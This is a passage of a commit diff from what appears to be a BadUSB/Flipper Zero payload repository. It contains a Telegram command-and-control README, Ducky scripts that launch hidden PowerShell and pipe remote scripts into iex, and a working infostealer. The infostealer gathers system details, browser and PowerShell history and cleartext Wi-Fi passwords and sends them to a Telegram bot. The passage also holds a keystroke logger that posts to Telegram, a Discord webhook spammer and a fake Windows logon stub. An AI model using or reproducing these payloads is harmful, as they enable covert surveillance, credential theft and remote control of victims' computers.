**Auto Update** - The script checks for a newer version and updates if neccecary.
**Options List** - Once connected type "Options" to see a list of operations. ("ExtraInfo" will show more command info)
**Pause Session** - exits the current session and script waits for re-authrentication.
**Key Capture Standby** - only sends messages if keys are pressed and remains idle otherwise.
**File Size Intellegence** - Auto split Uploads over 50mb.
**Privilege Escalation** - The ability to send the user a UAC prompt for this script and restart if succesful.
**Toggle Error Messaging** - Turn On or Off returning error messages to the chat. (Off by default)
**Reverse shell** - apart from running the modules, once connected the chat can act as a reverse shell.
**Killswitch** - Any Modules such as "KeyCapture" and "Exfiltrate" can be killed by typing "KILL" into chat
(this returns the session so it can accept further commands (does not kill the current session.))
-----------------------------------------------------------------------------------------------------------------------------
**TELEGRAM SETUP INSTRUCTIONS**
----------------------
1. Install Telegram and make an account if you haven't already.
2. Visit https://t.me/botfather and make a bot. (make a note of the API token)
3. Click the provided link to open the chat E.G. "t.me/****bot" then type or click /start)
4. At the start off the the Script - Replace `$tg` with your Telegram Bot API Token (only when running ps1 directly (not changed using Flipper, VBScript etc as it should be pre-defined there.. eg. `$tg = 'TOKEN'`))
5. Run the script on target system
6. Check telegram chat for 'waiting to connect' message.
7. This script has a feature to wait until you start the session from Telegram.
8. Type the computer name from the 'waiting' message into Telegram bot chat to connect to that computer's session.
-----------------------------------------------------------------------------------------------------------------------------
**MODULES INFORMATION**
-----------------------
`Options` : Show a menu in chat listing all the below functions
`Kill` : Killswitch for `Key-Capture` and `Exfiltrate` commands (can take a few seconds to kill.)
`Extra-Info` : Extra command information and examples sent to the chat
`Close` : Close the Session completely
`Pause-Session` : Pauses the session (to reconnect type in the computer name again)
`Toggle-Errors` : Toggle error messages to the chat ON or OFF and returns the current state to chat
`Folder-Tree` : Gets Directory trees for User folders and sends it zipped to the chat
`SpeechToText` : Send audio transcript to Discord
`Screenshot` : Sends a screenshot of the desktop as a png file
`Key-capture` : Capture Keystrokes and send them (collected keystrokes are only sent after 10 seconds of keyboard inactivity)
`System-info` : Send System info as text file (system, user, hardware, ip information and more)
`Enumerate-LAN` : find info on other network devices (IPv4, MAC address, Hostname, Manufacturer) (eg. `Enumerate-LAN -prefix 192.168.1`)
`Add-Persistance` : Add Telegram C2 to Startup (Copy the script to a default windows location and a vbs script to the startup folder)
`Remove-Persistance` : Remove Startup Persistance (Remove the ps1 script and vbs file)
`Is-Admin` : Checks if session has admin Privileges and returns the result
`Attempt-Elevate` : Send user a prompt to grant Administrator privilages in a new session. (if the user accepts the prompt)
`Message` : Send a message in a pop-up window to connected computer `Message "Your Message Here!"`
`Take-Picture` : Take a picture with any connected camera/webcam and upload to chat.
`Record-Audio` : Record microphone to mp3 file and upload to chat. eg. `Record-Audio -t 100` in seconds
`Record-Screen` : Record Screen to mkv file and upload to chat. eg. `Record-Screen -t 100` in seconds
`Nearby-Wifi` : Show nearby wifi networks
`Send-Hydra` : Never ending popups (use killswitch)
`Exfiltrate` : Searches for, and sends, files to the chat as zip files split into 50mb each (Telegram max upload limit.)
EXFILTRATION EXAMPLE COMMAND = `Exfiltrate -path [FOLDERS] -filetype [FILETYPES]`
FOLDERS = Documents, Desktop, Downloads, OneDrive, Pictures, Videos
FILETYPES = log, db, txt, doc, pdf, jpg, jpeg, png, wdoc, xdoc, cer, key, xls, xlsx, cfg, conf, docx, rft
**ADMIN ONLY FUNCTIONS**
`Disable-AV` : Attempt to exclude C:/ from Defender Scanning (Crude disable method)
`Disable-HID` : Disable Mice and Keyboards on the target system
`Enable-HID` : Enable Mice and Keyboards on the target system
*(Commands are not case sensitive)*
-----------------------------------------------------------------------------------------------------------------------------
Builder GUI example
![Screenshot_1](https://github.com/beigeworm/Powershell-Tools-and-Toys/assets/93350544/5424ba95-d4bd-4667-a2b5-cf681f049698)
Telegram Chat example
![telec2](https://github.com/beigeworm/Powershell-Tools-and-Toys/assets/93350544/58ec957d-4792-4d5a-9f06-ced4ccc3408d)
o 'kill' to stop 'KeyCapture' or 'Exfiltrate' command and return to waiting for commands.

27
Telegram-C2/Telegram C2 Client.txt Normal file
View File

@@ -0,0 +1,27 @@
REM Title: beigeworm's Telegram Command And Control.
REM Author: @beigeworm
REM Description: Using a Telegram Bot's Chat to Act as a Command and Control Platform.
REM Target: Windows 10 and 11
REM SETUP INSTRUCTIONS
REM 1. visit https://t.me/botfather and make a bot.
REM 2. add bot api to script.
REM 3. search for bot in top left box in telegram and start a chat then type /start.
REM 5. Run Script on target System
REM 6. Check telegram chat for 'waiting to connect' message.
REM 7. this script has a feature to wait until you start the session from telegram.
REM 8. type in the computer name from that message into telegram bot chat to connect to that computer.
REM 9. Replace TELEGRAM_BOT_API_TOKEN_HERE Below with your Telegram Bot API Token
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NonI -NoP -Ep Bypass -C $tg='TELEGRAM_BOT_API_TOKEN_HERE'; irm https://raw.githubusercontent.com/beigeworm/PoshGram-C2/main/Telegram-C2-Client.ps1 | iex
ENTER

14
Telegram-Infostealer/README.md Normal file
View File

@@ -0,0 +1,14 @@
<h2 align="center"> Telegram System InfoStealer </h2>
SYNOPSIS
This script gathers system information and posts to Telegram Bot Chat with the results.
SETUP INSTRUCTIONS
1. visit https://t.me/botfather and make a bot.
2. add bot api to script.
3. search for bot in top left box in telegram and start a chat then type /start.
4. Replace YOUR_BOT_TOKEN_FOR_TELEGRAM with your bot token
5. Run Script on target System

19
Telegram-Infostealer/System-Info-to-Telegram.txt Normal file
View File

@@ -0,0 +1,19 @@
REM Title: beigeworm's system information to Telegram Bot
REM Author: @beigeworm
REM Description: This script gathers system information and posts to Telegram Bot Chat with the results.
REM Target: Windows 10
REM *SETUP*
REM replace BOT_TOKEN with your Telegram bot token.
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $tg='BOT_TOKEN';$cid='CHAT_ID'; irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Telegram-Infostealer/main.ps1 | iex
ENTER

95
Telegram-Infostealer/main.ps1 Normal file
View File

@@ -0,0 +1,95 @@
$token= "$tg"
$apiUrl = "https://api.telegram.org/bot$Token/sendMessage"
$URL = 'https://api.telegram.org/bot{0}' -f $Token
while($chatID.length -eq 0){
$updates = Invoke-RestMethod -Uri ($url + "/getUpdates")
if ($updates.ok -eq $true) {$latestUpdate = $updates.result[-1]
if ($latestUpdate.message -ne $null){$chatID = $latestUpdate.message.chat.id}}
Sleep 10
}
$charCodes = @(0x2705, 0x1F4BB, 0x274C, 0x1F55C, 0x1F50D, 0x1F517, 0x23F8)
$chars = $charCodes | ForEach-Object { [char]::ConvertFromUtf32($_) }
$tick, $comp, $closed, $waiting, $glass, $cmde, $pause = $chars
Function Post-Message{$script:params = @{chat_id = $ChatID ;text = $contents};Invoke-RestMethod -Uri $apiUrl -Method POST -Body $params}
Function Post-File{curl.exe -F chat_id="$ChatID" -F document=@"$filePath" "https://api.telegram.org/bot$Token/sendDocument" | Out-Null}
$contents = "$comp Gathering System Information for $env:COMPUTERNAME $comp"
Post-Message
$userInfo = Get-WmiObject -Class Win32_UserAccount ;$fullName = $($userInfo.FullName) ;$fullName = ("$fullName").TrimStart("")
$email = (Get-ComputerInfo).WindowsRegisteredOwner
$systemLocale = Get-WinSystemLocale;$systemLanguage = $systemLocale.Name
$userLanguageList = Get-WinUserLanguageList;$keyboardLayoutID = $userLanguageList[0].InputMethodTips[0]
$computerPubIP=(Invoke-WebRequest ipinfo.io/ip -UseBasicParsing).Content
$systemInfo = Get-WmiObject -Class Win32_OperatingSystem
$ver = (Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion').DisplayVersion
$processorInfo = Get-WmiObject -Class Win32_Processor
$computerSystemInfo = Get-WmiObject -Class Win32_ComputerSystem
$userInfo = Get-WmiObject -Class Win32_UserAccount
$videocardinfo = Get-WmiObject Win32_VideoController
$Hddinfo = Get-WmiObject Win32_LogicalDisk | select DeviceID, VolumeName, FileSystem,@{Name="Size_GB";Expression={"{0:N1} GB" -f ($_.Size / 1Gb)}}, @{Name="FreeSpace_GB";Expression={"{0:N1} GB" -f ($_.FreeSpace / 1Gb)}}, @{Name="FreeSpace_percent";Expression={"{0:N1}%" -f ((100 / ($_.Size / $_.FreeSpace)))}} | Format-Table DeviceID, VolumeName,FileSystem,@{ Name="Size GB"; Expression={$_.Size_GB}; align="right"; }, @{ Name="FreeSpace GB"; Expression={$_.FreeSpace_GB}; align="right"; }, @{ Name="FreeSpace %"; Expression={$_.FreeSpace_percent}; align="right"; } ;$Hddinfo=($Hddinfo| Out-String) ;$Hddinfo = ("$Hddinfo").TrimEnd("")
$RamInfo = Get-WmiObject Win32_PhysicalMemory | Measure-Object -Property capacity -Sum | % { "{0:N1} GB" -f ($_.sum / 1GB)}
$users = "$($userInfo.Name)"
$userString = "`nFull Name : $($userInfo.FullName)"
$OSString = "$($systemInfo.Caption) $($systemInfo.OSArchitecture)"
$systemString = "Processor : $($processorInfo.Name)"
$systemString += "`nMemory : $RamInfo"
$systemString += "`nGpu : $($videocardinfo.Name)"
$systemString += "`nStorage : $Hddinfo"
$COMDevices = Get-Wmiobject Win32_USBControllerDevice | ForEach-Object{[Wmi]($_.Dependent)} | Select-Object Name, DeviceID, Manufacturer | Sort-Object -Descending Name | Format-Table
$process=Get-WmiObject win32_process | select Handle, ProcessName, ExecutablePath, CommandLine
$service=Get-CimInstance -ClassName Win32_Service | select State,Name,StartName,PathName | Where-Object {$_.State -like 'Running'}
$software=Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | where { $_.DisplayName -notlike $null } | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Sort-Object DisplayName | Format-Table -AutoSize
$drivers=Get-WmiObject Win32_PnPSignedDriver| where { $_.DeviceName -notlike $null } | select DeviceName, FriendlyName, DriverProviderName, DriverVersion
$Regex = '(http|https)://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?';$Path = "$Env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\History"
$Value = Get-Content -Path $Path | Select-String -AllMatches $regex |% {($_.Matches).Value} |Sort -Unique
$Value | ForEach-Object {$Key = $_;if ($Key -match $Search){New-Object -TypeName PSObject -Property @{User = $env:UserName;Browser = 'chrome';DataType = 'history';Data = $_}}}
$Regex2 = '(http|https)://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?';$Pathed = "$Env:USERPROFILE\AppData\Local\Microsoft/Edge/User Data/Default/History"
$Value2 = Get-Content -Path $Pathed | Select-String -AllMatches $regex2 |% {($_.Matches).Value} |Sort -Unique
$Value2 | ForEach-Object {$Key = $_;if ($Key -match $Search){New-Object -TypeName PSObject -Property @{User = $env:UserName;Browser = 'chrome';DataType = 'history';Data = $_}}}
$pshist = "$env:USERPROFILE\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt";$pshistory = Get-Content $pshist -raw
$FilePath = "$env:temp\systeminfo.txt"
$outssid="";$a=0;$ws=(netsh wlan show profiles) -replace ".*:\s+";foreach($s in $ws){
if($a -gt 1 -And $s -NotMatch " policy " -And $s -ne "User profiles" -And $s -NotMatch "-----" -And $s -NotMatch "<None>" -And $s.length -gt 5){$ssid=$s.Trim();if($s -Match ":"){$ssid=$s.Split(":")[1].Trim()}
$pw=(netsh wlan show profiles name=$ssid key=clear);$pass="None";foreach($p in $pw){if($p -Match "Key Content"){$pass=$p.Split(":")[1].Trim();$outssid+="SSID: $ssid : Password: $pass`n"}}}$a++;}
$RecentFiles = Get-ChildItem -Path $env:USERPROFILE -Recurse -File | Sort-Object LastWriteTime -Descending | Select-Object -First 100 FullName, LastWriteTime
$contents = "========================================================
Current User : $env:USERNAME
Email Address : $email
Language : $systemLanguage
Keyboard Layout : $keyboardLayoutID
Other Accounts : $users
Public IP : $computerPubIP
Current OS : $OSString
Build : $ver
Hardware Info
--------------------------------------------------------
$systemString"
"--------------------- SYSTEM INFORMATION for $env:COMPUTERNAME -----------------------`n" | Out-File -FilePath $FilePath -Encoding ASCII
"General Info `n $contents" | Out-File -FilePath $FilePath -Encoding ASCII -Append
"Network Info `n -----------------------------------------------------------------------`n$outssid" | Out-File -FilePath $FilePath -Encoding ASCII -Append
"USB Info `n -----------------------------------------------------------------------" | Out-File -FilePath $FilePath -Encoding ASCII -Append
($COMDevices| Out-String) | Out-File -FilePath $FilePath -Encoding ASCII -Append
"`n" | Out-File -FilePath $FilePath -Encoding ASCII -Append
"SOFTWARE INFO `n ======================================================================" | Out-File -FilePath $FilePath -Encoding ASCII -Append
"Installed Software `n -----------------------------------------------------------------------" | Out-File -FilePath $FilePath -Encoding ASCII -Append
($software| Out-String) | Out-File -FilePath $FilePath -Encoding ASCII -Append
"Processes `n -----------------------------------------------------------------------" | Out-File -FilePath $FilePath -Encoding ASCII -Append
($process| Out-String) | Out-File -FilePath $FilePath -Encoding ASCII -Append
"Services `n -----------------------------------------------------------------------" | Out-File -FilePath $FilePath -Encoding ASCII -Append
($service| Out-String) | Out-File -FilePath $FilePath -Encoding ASCII -Append
"Drivers `n -----------------------------------------------------------------------`n$drivers" | Out-File -FilePath $FilePath -Encoding ASCII -Append
"`n" | Out-File -FilePath $FilePath -Encoding ASCII -Append
"HISTORY INFO `n ====================================================================== `n" | Out-File -FilePath $FilePath -Encoding ASCII -Append
"Browser History `n -----------------------------------------------------------------------" | Out-File -FilePath $FilePath -Encoding ASCII -Append
($Value| Out-String) | Out-File -FilePath $FilePath -Encoding ASCII -Append
($Value2| Out-String) | Out-File -FilePath $FilePath -Encoding ASCII -Append
"Powershell History `n -----------------------------------------------------------------------" | Out-File -FilePath $FilePath -Encoding ASCII -Append
($pshistory| Out-String) | Out-File -FilePath $FilePath -Encoding ASCII -Append
"Recent Files `n -----------------------------------------------------------------------" | Out-File -FilePath $FilePath -Encoding ASCII -Append
($RecentFiles | Out-String) | Out-File -FilePath $FilePath -Encoding ASCII -Append
Post-Message
Post-File ;rm -Path $FilePath -Force

20
Telegram-Keylogger/Keylogger-to-Telegram.txt Normal file
View File

@@ -0,0 +1,20 @@
REM Title: beigeworm's Keyloggger to Telegram Chat.
REM Author: @beigeworm
REM Description: This script logs all Keystrokes and posts results to a Telegram chat when the keyboard goes inactive for more than 10 secs.
REM Target: Windows 10
REM *SETUP*
REM replace TOKEN_HERE with your Telegram token.
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $tg='TOKEN_HERE'; irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Telegram-Keylogger/main.ps1 | iex
ENTER

13
Telegram-Keylogger/README.md Normal file
View File

@@ -0,0 +1,13 @@
<h2 align="center"> Keylogger To Telegram Chat </h2>
SYNOPSIS
This script connects target computer with a telegram chat to capture keystrokes.
SETUP INSTRUCTIONS
1. visit https://t.me/botfather and make a bot.
2. add bot api to script.
3. search for bot in top left box in telegram and start a chat then type /start.
5. Run Script on target System

56
Telegram-Keylogger/main.ps1 Normal file
View File

@@ -0,0 +1,56 @@
$Token = "$tg"
$PassPhrase = "$env:COMPUTERNAME"
$URL='https://api.telegram.org/bot{0}' -f $Token
while($chatID.length -eq 0){
$updates = Invoke-RestMethod -Uri ($url + "/getUpdates")
if ($updates.ok -eq $true) {$latestUpdate = $updates.result[-1]
if ($latestUpdate.message -ne $null){$chatID = $latestUpdate.message.chat.id}}
Sleep 10
}
Function KeyCapture {
$MessageToSend = New-Object psobject
$MessageToSend | Add-Member -MemberType NoteProperty -Name 'chat_id' -Value $ChatID
$MessageToSend | Add-Member -MemberType NoteProperty -Name 'text' -Value "$env:COMPUTERNAME : KeyCapture Started." -Force
irm -Method Post -Uri ($URL +'/sendMessage') -Body ($MessageToSend | ConvertTo-Json) -ContentType "application/json"
$API = '[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] public static extern short GetAsyncKeyState(int virtualKeyCode); [DllImport("user32.dll", CharSet=CharSet.Auto)]public static extern int GetKeyboardState(byte[] keystate);[DllImport("user32.dll", CharSet=CharSet.Auto)]public static extern int MapVirtualKey(uint uCode, int uMapType);[DllImport("user32.dll", CharSet=CharSet.Auto)]public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);'
$API = Add-Type -MemberDefinition $API -Name 'Win32' -Namespace API -PassThru
$LastKeypressTime = [System.Diagnostics.Stopwatch]::StartNew()
$KeypressThreshold = [TimeSpan]::FromSeconds(10)
While ($true){
$keyPressed = $false
try{
while ($LastKeypressTime.Elapsed -lt $KeypressThreshold) {
Start-Sleep -Milliseconds 30
for ($asc = 8; $asc -le 254; $asc++){
$keyst = $API::GetAsyncKeyState($asc)
if ($keyst -eq -32767) {
$keyPressed = $true
$LastKeypressTime.Restart()
$null = [console]::CapsLock
$vtkey = $API::MapVirtualKey($asc, 3)
$kbst = New-Object Byte[] 256
$checkkbst = $API::GetKeyboardState($kbst)
$logchar = New-Object -TypeName System.Text.StringBuilder
if ($API::ToUnicode($asc, $vtkey, $kbst, $logchar, $logchar.Capacity, 0)) {
$LString = $logchar.ToString()
if ($asc -eq 8) {$LString = "[BKSP]"}
if ($asc -eq 13) {$LString = "[ENT]"}
if ($asc -eq 27) {$LString = "[ESC]"}
$nosave += $LString
}}}}}
finally{
If ($keyPressed) {
$escmsgsys = $nosave -replace '[&<>]', {$args[0].Value.Replace('&', '&amp;').Replace('<', '&lt;').Replace('>', '&gt;')}
$timestamp = Get-Date -Format "dd-MM-yyyy HH:mm:ss"
$escmsg = "Keys Captured : "+$escmsgsys
$MessageToSend | Add-Member -MemberType NoteProperty -Name 'text' -Value "$escmsg" -Force
irm -Method Post -Uri ($URL +'/sendMessage') -Body ($MessageToSend | ConvertTo-Json) -ContentType "application/json"
$keyPressed = $false
$nosave = ""
}
}
$LastKeypressTime.Restart()
Start-Sleep -Milliseconds 10
}
}

10
US-Keyboard-Layout/README.md Normal file
View File

@@ -0,0 +1,10 @@
<h2 align="center"> Set US Keyboard Layout </h2>
SYNOPSIS
This script changes the keyboard layout and system language to US.
USAGE
1. Run the script on a target system

17
US-Keyboard-Layout/US-Keyboard.txt Normal file
View File

@@ -0,0 +1,17 @@
REM Title: beigeworm's Keyboard Language changer.
REM Author: @beigeworm
REM Description: This script changes the keyboard layout and system language to US.
REM Target: Windows 10
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/US-Keyboard-Layout/main.ps1 | iex
ENTER

9
US-Keyboard-Layout/main.ps1 Normal file
View File

@@ -0,0 +1,9 @@
Function SetkbUS {
Dism /online /Get-Intl
Set-WinSystemLocale en-US
Set-WinUserLanguageList en-US -force
}
SetkbUS

11
Wallpaper-Jumpscare/README.md Normal file
View File

@@ -0,0 +1,11 @@
<h2 align="center"> Simple Wallpaper Changer </h2>
SYNOPSIS
This script will download an image from the web and set it as the wallpaper.
USAGE
1. Change DIRECT IMAGE LINK HERE to your URL.
2. Run the script.

18
Wallpaper-Jumpscare/Wallpaper-Jumpscare.txt Normal file
View File

@@ -0,0 +1,18 @@
REM Title: beigeworm's Wallpaper Jump Scare.
REM Author: @beigeworm
REM Description: This script changes downlaods a scary image and sets it as a wallpaper.
REM Target: Windows 10
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Wallpaper-Jumpscare/main.ps1
| iex
CTRL-SHIFT ENTER
DELAY 3000
ALT y

23
Wallpaper-Jumpscare/main.ps1 Normal file
View File

@@ -0,0 +1,23 @@
$url = "https://i.ibb.co/XJSPt9s/1.png"
$outputPath = "$env:temp\img.jpg"
$wallpaperStyle = 2 # 0: Tiled, 1: Centered, 2: Stretched
IWR -Uri $url -OutFile $outputPath
$signature = @'
using System;
using System.Runtime.InteropServices;
public class Wallpaper {
[DllImport("user32.dll", CharSet = CharSet.Auto)]
public static extern int SystemParametersInfo(int uAction, int uParam, string lpvParam, int fuWinIni);
}
'@
Add-Type -TypeDefinition $signature
$SPI_SETDESKWALLPAPER = 0x0014
$SPIF_UPDATEINIFILE = 0x01
$SPIF_SENDCHANGE = 0x02
[Wallpaper]::SystemParametersInfo($SPI_SETDESKWALLPAPER, 0, $outputPath, $SPIF_UPDATEINIFILE -bor $SPIF_SENDCHANGE)

12
Webhook-Spammer-GUI/README.md Normal file
View File

@@ -0,0 +1,12 @@
<h2 align="center"> Discord Spammer With GUI </h2>
SYNOPSIS
Creates a GUI with functionality to spam a webhook with text or an image.
USAGE
1. Run script with powershell
2. Input ip Range and select additional parameters
3. Press "Start Scan"

16
Webhook-Spammer-GUI/Webhook-Spammer-GUI.txt Normal file
View File

@@ -0,0 +1,16 @@
REM Title: beigeworm's Webhook Spammer GUI Tool.
REM Author: @beigeworm
REM Description: This script creates a GUI for Spamming a webhook with text or an image.
REM Target: Windows 10
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Webhook-Spammer-GUI/main.ps1 | iex
ENTER

215
Webhook-Spammer-GUI/main.ps1 Normal file
View File

@@ -0,0 +1,215 @@
Add-Type -AssemblyName System.Windows.Forms
Add-Type -AssemblyName System.Drawing
Add-Type -AssemblyName Microsoft.VisualBasic
[System.Windows.Forms.Application]::EnableVisualStyles()
$tooltip1 = New-Object System.Windows.Forms.ToolTip
$ShowHelp={
Switch ($this.name) {
"start" {$tip = "Start Spamming!"}
"image" {$tip = "Select an Image"}
"url" {$tip = "Input Discord Webhook URL"}
"message" {$tip = "Input Message Here"}
"imgpath" {$tip = "Path to your Image"}
"delay" {$tip = "Delay Between Sending"}
"amount" {$tip = "Amount of Messages to Send"}
}
$tooltip1.SetToolTip($this,$tip)
}
$MainWindow = New-Object System.Windows.Forms.Form
$MainWindow.ClientSize = '435,300'
$MainWindow.Text = "| BeigeTools | Webhook Spammer |"
$MainWindow.BackColor = "#242424"
$MainWindow.Opacity = 1
$MainWindow.TopMost = $true
$MainWindow.Icon = [System.Drawing.Icon]::ExtractAssociatedIcon("C:\Windows\System32\DevicePairingWizard.exe")
$StartSpam = New-Object System.Windows.Forms.Button
$StartSpam.Text = "Start"
$StartSpam.Width = 80
$StartSpam.Height = 25
$StartSpam.Location = New-Object System.Drawing.Point(340, 263)
$StartSpam.Font = 'Microsoft Sans Serif,8,style=Bold'
$StartSpam.BackColor = "#eeeeee"
$StartSpam.add_MouseHover($showhelp)
$StartSpam.name="start"
$selimage = New-Object System.Windows.Forms.Button
$selimage.Text = "Browse"
$selimage.Width = 80
$selimage.Height = 25
$selimage.Location = New-Object System.Drawing.Point(245, 263)
$selimage.Font = 'Microsoft Sans Serif,8,style=Bold'
$selimage.BackColor = "#eeeeee"
$selimage.add_MouseHover($showhelp)
$selimage.name="image"
$URLboxInputHeader = New-Object System.Windows.Forms.Label
$URLboxInputHeader.Text = "Discord Webhook URL"
$URLboxInputHeader.ForeColor = "#bcbcbc"
$URLboxInputHeader.AutoSize = $true
$URLboxInputHeader.Width = 25
$URLboxInputHeader.Height = 10
$URLboxInputHeader.Location = New-Object System.Drawing.Point(15, 15)
$URLboxInputHeader.Font = 'Microsoft Sans Serif,8,style=Bold'
$URLboxInput = New-Object System.Windows.Forms.TextBox
$URLboxInput.Location = New-Object System.Drawing.Point(20, 35)
$URLboxInput.BackColor = "#eeeeee"
$URLboxInput.Width = 400
$URLboxInput.Height = 40
$URLboxInput.Text = "https://discord.com/api/webhooks/..."
$URLboxInput.Multiline = $false
$URLboxInput.Font = 'Microsoft Sans Serif,8,style=Bold'
$URLboxInput.add_MouseHover($showhelp)
$URLboxInput.name="url"
$TextboxInputHeader = New-Object System.Windows.Forms.Label
$TextboxInputHeader.Text = "Message Content"
$TextboxInputHeader.ForeColor = "#bcbcbc"
$TextboxInputHeader.AutoSize = $true
$TextboxInputHeader.Width = 25
$TextboxInputHeader.Height = 10
$TextboxInputHeader.Location = New-Object System.Drawing.Point(15, 63)
$TextboxInputHeader.Font = 'Microsoft Sans Serif,8,style=Bold'
$TextBoxInput = New-Object System.Windows.Forms.TextBox
$TextBoxInput.Location = New-Object System.Drawing.Point(20, 83)
$TextBoxInput.BackColor = "#eeeeee"
$TextBoxInput.Width = 400
$TextBoxInput.Height = 110
$TextBoxInput.Text = ""
$TextBoxInput.Multiline = $true
$TextBoxInput.Font = 'Microsoft Sans Serif,8,style=Bold'
$TextBoxInput.add_MouseHover($showhelp)
$TextBoxInput.name="message"
$ImageInputHeader = New-Object System.Windows.Forms.Label
$ImageInputHeader.Text = "Image Path"
$ImageInputHeader.ForeColor = "#bcbcbc"
$ImageInputHeader.AutoSize = $true
$ImageInputHeader.Width = 25
$ImageInputHeader.Height = 10
$ImageInputHeader.Location = New-Object System.Drawing.Point(15, 200)
$ImageInputHeader.Font = 'Microsoft Sans Serif,8,style=Bold'
$ImageInput = New-Object System.Windows.Forms.TextBox
$ImageInput.Location = New-Object System.Drawing.Point(20, 220)
$ImageInput.BackColor = "#eeeeee"
$ImageInput.Width = 400
$ImageInput.Height = 20
$ImageInput.Text = ""
$ImageInput.Multiline = $true
$ImageInput.Font = 'Microsoft Sans Serif,8,style=Bold'
$ImageInput.add_MouseHover($showhelp)
$ImageInput.name="imgpath"
$coolboxInputHeader = New-Object System.Windows.Forms.Label
$coolboxInputHeader.Text = "Cooldown"
$coolboxInputHeader.ForeColor = "#bcbcbc"
$coolboxInputHeader.AutoSize = $true
$coolboxInputHeader.Width = 25
$coolboxInputHeader.Height = 10
$coolboxInputHeader.Location = New-Object System.Drawing.Point(115, 245)
$coolboxInputHeader.Font = 'Microsoft Sans Serif,8,style=Bold'
$coolboxInput = New-Object System.Windows.Forms.TextBox
$coolboxInput.Location = New-Object System.Drawing.Point(120, 265)
$coolboxInput.BackColor = "#eeeeee"
$coolboxInput.Width = 60
$coolboxInput.Height = 40
$coolboxInput.Text = "700"
$coolboxInput.Multiline = $false
$coolboxInput.Font = 'Microsoft Sans Serif,8,style=Bold'
$coolboxInput.add_MouseHover($showhelp)
$coolboxInput.name="delay"
$amtboxInputHeader = New-Object System.Windows.Forms.Label
$amtboxInputHeader.Text = "Amount"
$amtboxInputHeader.ForeColor = "#bcbcbc"
$amtboxInputHeader.AutoSize = $true
$amtboxInputHeader.Width = 25
$amtboxInputHeader.Height = 10
$amtboxInputHeader.Location = New-Object System.Drawing.Point(15, 245)
$amtboxInputHeader.Font = 'Microsoft Sans Serif,8,style=Bold'
$amtBoxInput = New-Object System.Windows.Forms.TextBox
$amtBoxInput.Location = New-Object System.Drawing.Point(20, 265)
$amtBoxInput.BackColor = "#eeeeee"
$amtBoxInput.Width = 60
$amtBoxInput.Height = 40
$amtBoxInput.Text = "100"
$amtBoxInput.Multiline = $false
$amtBoxInput.Font = 'Microsoft Sans Serif,8,style=Bold'
$amtBoxInput.add_MouseHover($showhelp)
$amtBoxInput.name="amount"
$mstext = New-Object System.Windows.Forms.Label
$mstext.Text = "ms"
$mstext.ForeColor = "#bcbcbc"
$mstext.AutoSize = $true
$mstext.Width = 25
$mstext.Height = 10
$mstext.Location = New-Object System.Drawing.Point(185, 268)
$mstext.Font = 'Microsoft Sans Serif,8,style=Bold'
#==================================================== Define GUI Elements ==========================================================
$MainWindow.controls.AddRange(@($StartSpam, $ImageInput, $ImageInputHeader, $selimage, $URLBoxInput, $URLBoxInputHeader, $TextBoxInput, $coolboxInput, $amtBoxInput, $TextboxInputHeader, $coolboxInputHeader, $amtboxInputHeader, $mstext))
#==================================================== Click Functions ==========================================================
$StartSpam.Add_Click({
$hookurl = $URLBoxInput.Text
$n = [int]$amtBoxInput.Text
$c = [int]$coolBoxInput.Text
$i = 0
while($i -lt $n) {
$msgsys = $TextboxInput.Text
$escmsgsys = $msgsys -replace '[&<>]', {$args[0].Value.Replace('&', '&amp;').Replace('<', '&lt;').Replace('>', '&gt;')}
$jsonsys = @{"username" = "Spammer" ;"content" = $escmsgsys} | ConvertTo-Json
Start-Sleep -Milliseconds $c
Invoke-RestMethod -Uri $hookurl -Method Post -ContentType "application/json" -Body $jsonsys
$i++
}
$imageBytes = [System.IO.File]::ReadAllBytes($ImageInput.Text)
$b64 = [System.Convert]::ToBase64String($imageBytes)
$decodedFile = [System.Convert]::FromBase64String($b64)
$File = "$env:temp\bl.png"
Set-Content -Path $File -Value $decodedFile -Encoding Byte
while($i -lt $n) {
curl.exe -F "file1=@$file" $hookurl
$i++
}
Remove-Item -Path $file -Force
})
$selimage.Add_Click({
$FileDialog = New-Object Windows.Forms.OpenFileDialog
$FileDialog.Filter = "All Files (*.*)|*.*"
if ($FileDialog.ShowDialog() -eq [Windows.Forms.DialogResult]::OK) {
$SelectedFilePath = $FileDialog.FileName
$ImageInput.Text = $SelectedFilePath
}
})
$MainWindow.ShowDialog() | Out-Null
exit

17
Win10-Phishing/Fake-Windows-10-Logon.txt Normal file
View File

@@ -0,0 +1,17 @@
